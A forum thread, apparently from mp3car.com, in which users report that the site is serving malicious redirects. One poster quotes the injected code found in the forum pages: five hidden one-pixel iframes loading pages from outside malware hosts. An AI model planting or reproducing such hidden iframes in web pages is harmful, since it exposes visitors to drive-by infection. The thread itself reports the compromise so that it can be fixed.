He he , the badgers profile is a threat![]()
It's still happening?
I get multiple tabs being opened in IE8 titled "Halted" with the following link
http://kronos.bravenetmedia.com/brav...7&category=902
avast is now spitting out JS:Redirector-M [Trj] reports......
openMobile - An open source C# Front End (why choose openMobile?)
- Always Recruiting Developers -
Like what you see? Donations are always welcome
every mp3car.com site, forums and all except the store...
openMobile - An open source C# Front End (why choose openMobile?)
- Always Recruiting Developers -
Like what you see? Donations are always welcome
Get a decent browser.....every mp3car.com site, forums and all except the store...
But yea I can confirm
openMobile - An open source C# Front End (why choose openMobile?)
- Always Recruiting Developers -
Like what you see? Donations are always welcome
I meant chrome... but it shouldn't matter-the site shouldn't be this full of crap.
For whoever is/was in charge of mp3car's security:
Please remove this crap from the forum code and fix the compromised server. There really is no reason this should have happened twice:
Code:<iframe width=1 height=1 border=0 frameborder=0 src="http://nylicodaza.kogaryu.com/isizynu.html"></iframe> <iframe width=1 height=1 border=0 frameborder=0 src="http://hygorefyh.1accesshost.com/isizynu.html"></iframe> <iframe width=1 height=1 border=0 frameborder=0 src="http://ubehyjuba.100freemb.com/isizynu.html"></iframe> <iframe width=1 height=1 border=0 frameborder=0 src="http://jodahezir.100freemb.com/wizynu.html"></iframe> <iframe width=1 height=1 border=0 frameborder=0 src="http://itowurupoq.servetown.com/wizynu.html"></iframe>
openMobile - An open source C# Front End (why choose openMobile?)
- Always Recruiting Developers -
Like what you see? Donations are always welcome
Bookmarks